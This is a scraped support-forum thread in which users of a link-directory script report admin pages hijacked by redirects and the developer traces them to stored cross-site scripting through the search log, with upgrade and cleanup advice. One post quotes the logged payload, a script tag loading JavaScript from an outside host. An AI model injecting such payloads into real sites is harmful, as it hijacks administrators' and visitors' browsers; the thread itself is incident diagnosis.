When I go into admin, my admin index page is blank except for a link "click here to enter web site".
The link is pointing to a web site url. Clicking the link opens another window with a portal type web site in it.
Once the link is clicked, I do get my admin index page in the original admin frame.
It appears some java script has been installed.
May not be related, but this showed up for the first time after a site had been submitted that is on a "verizonsupersite" domain. When I visit the submitted site I first see a smilar blank page and then am taken to the site.
When I enter admin, the main page appears in the big frame, but then apparently a redirect switches the frame to this blank page with the one link.
I have looked at the index.php file and the main.tpl file to see if I can see anything that appears to have been inserted somehow.
I am clueless on how something like this is done, and have no idea how to get rid of it.
All the links in thw admin left column frame still work and take you to the correct page, except that clicking the Main button causes the return to Main, with the redirect to this other page. (The page you are redirected to is some portal called Find.FM)
I just installed the 3.4.6 upgrade, and the problem is gone.
Since the upgrade does not replace the admin or integration directories, I assume something had been added to one of the files that was overwritten by the upgrade.
Anyone have any ideas on keeping this from ahppening again?
According to someone who just emailed me, they had search logging enabled and a search log listing in their admin panel and someone performed a search which consisted of a javascript that redirected to their website. If that's what happened, turn off your search log for the time being (will fix in 4.0.7).
It's certainly an intentional cross-site scripting hack, they're going through doing it to everyone. The relatively good news though is I don't think there's any danger of them getting database or file access, all they can do is redirect.
It's fixed in 4.0.7. Upgrading from a previous 4.0.x is easy, and 3.x used a completely different sort of search logging (to file instead of database) which would need a completely different fix written, which I might put into a 3.4.7 at some point for stragglers.
The offending web site also did a submit on a contact form I have on my web site. I went to the url and it appears their host has shut their site down.
When I first checked the site said suspended page, but the javascript file was still working, so their host seems to do a lousy job of shutting things down.
I should mention that if I recall the search log fix only fixed new searches, not old ones, so you'd have to TRUNCATE TABLE wsnlinks_searches; to empty out old problem searches.
When I first checked the site said suspended page, but the javascript file was still working, so their host seems to do a lousy job of shutting things down.
I should mention that if I recall the search log fix only fixed new searches, not old ones, so you'd have to TRUNCATE TABLE wsnlinks_searches; to empty out old problem searches. (This only applies to 4.x upgraders, upgraders from 3.x have all new search data anyhow.)
0/5
1
2
3
4
5
This thread is closed, so you cannot post a reply.
Comments on Admin index page taken over
Forum Regular
Usergroup: Customer
Joined: Sep 22, 2004
Location: Wake Forest, NC
Total Topics: 23
Total Comments: 161
When I go into admin, my admin index page is blank except for a link "click here to enter web site".
The link is pointing to a web site url. Clicking the link opens another window with a portal type web site in it.
Once the link is clicked, I do get my admin index page in the original admin frame.
It appears some java script has been installed.
May not be related, but this showed up for the first time after a site had been submitted that is on a "verizonsupersite" domain. When I visit the submitted site I first see a smilar blank page and then am taken to the site.
Anyone else had this sort of thing happen?
Any tips on getting rid of it?
Forum Regular
Usergroup: Customer
Joined: Sep 22, 2004
Location: Wake Forest, NC
Total Topics: 23
Total Comments: 161
Additional info:
When I enter admin, the main page appears in the big frame, but then apparently a redirect switches the frame to this blank page with the one link.
I have looked at the index.php file and the main.tpl file to see if I can see anything that appears to have been inserted somehow.
I am clueless on how something like this is done, and have no idea how to get rid of it.
All the links in thw admin left column frame still work and take you to the correct page, except that clicking the Main button causes the return to Main, with the redirect to this other page. (The page you are redirected to is some portal called Find.FM)
Forum Regular
Usergroup: Customer
Joined: Sep 22, 2004
Location: Wake Forest, NC
Total Topics: 23
Total Comments: 161
I was running 3.4.2.
I just installed the 3.4.6 upgrade, and the problem is gone.
Since the upgrade does not replace the admin or integration directories, I assume something had been added to one of the files that was overwritten by the upgrade.
Anyone have any ideas on keeping this from ahppening again?
developer
Usergroup: Administrator
Joined: Dec 20, 2001
Location: Diamond Springs, California
Total Topics: 61
Total Comments: 7868
According to someone who just emailed me, they had search logging enabled and a search log listing in their admin panel and someone performed a search which consisted of a javascript that redirected to their website. If that's what happened, turn off your search log for the time being (will fix in 4.0.7).
Forum Regular
Usergroup: Customer
Joined: Sep 22, 2004
Location: Wake Forest, NC
Total Topics: 23
Total Comments: 161
Done
The serachlog.txt file only had one entry, so I assume it was renewed when I upgraded earlier today. Wish I had seen it prior to upgrading.
Thanks
Experienced
Usergroup: Customer
Joined: Jul 28, 2005
Total Topics: 30
Total Comments: 55
I have the problem, too. AND it just started in the last few days, as well. The link goes to http://www.usuc.us. Does yours go there also?
I'm wondering if this is really an accident or a hack. My first thought was that it was a hack.
Experienced
Usergroup: Customer
Joined: Jul 28, 2005
Total Topics: 30
Total Comments: 55
My searchlog shows that the hacker was submitting this to my search tool:
<script src=http://usuc.us/j.php>jonny</script>
developer
Usergroup: Administrator
Joined: Dec 20, 2001
Location: Diamond Springs, California
Total Topics: 61
Total Comments: 7868
It's certainly an intentional cross-site scripting hack, they're going through doing it to everyone. The relatively good news though is I don't think there's any danger of them getting database or file access, all they can do is redirect.
Experienced
Usergroup: Customer
Joined: Jul 28, 2005
Total Topics: 30
Total Comments: 55
Paul,
Is there something we can add to the search tool function that will strip HTML or other code from submitted searches?
developer
Usergroup: Administrator
Joined: Dec 20, 2001
Location: Diamond Springs, California
Total Topics: 61
Total Comments: 7868
It's fixed in 4.0.7. Upgrading from a previous 4.0.x is easy, and 3.x used a completely different sort of search logging (to file instead of database) which would need a completely different fix written, which I might put into a 3.4.7 at some point for stragglers.
Experienced
Usergroup: Customer
Joined: Jul 28, 2005
Total Topics: 30
Total Comments: 55
Ok. I'm planning on upgrading any day now.
Forum Regular
Usergroup: Customer
Joined: Sep 22, 2004
Location: Wake Forest, NC
Total Topics: 23
Total Comments: 161
The offending web site also did a submit on a contact form I have on my web site. I went to the url and it appears their host has shut their site down.
developer
Usergroup: Administrator
Joined: Dec 20, 2001
Location: Diamond Springs, California
Total Topics: 61
Total Comments: 7868
When I first checked the site said suspended page, but the javascript file was still working, so their host seems to do a lousy job of shutting things down.
I should mention that if I recall the search log fix only fixed new searches, not old ones, so you'd have to TRUNCATE TABLE wsnlinks_searches; to empty out old problem searches.
developer
Usergroup: Administrator
Joined: Dec 20, 2001
Location: Diamond Springs, California
Total Topics: 61
Total Comments: 7868
When I first checked the site said suspended page, but the javascript file was still working, so their host seems to do a lousy job of shutting things down.
I should mention that if I recall the search log fix only fixed new searches, not old ones, so you'd have to TRUNCATE TABLE wsnlinks_searches; to empty out old problem searches. (This only applies to 4.x upgraders, upgraders from 3.x have all new search data anyhow.)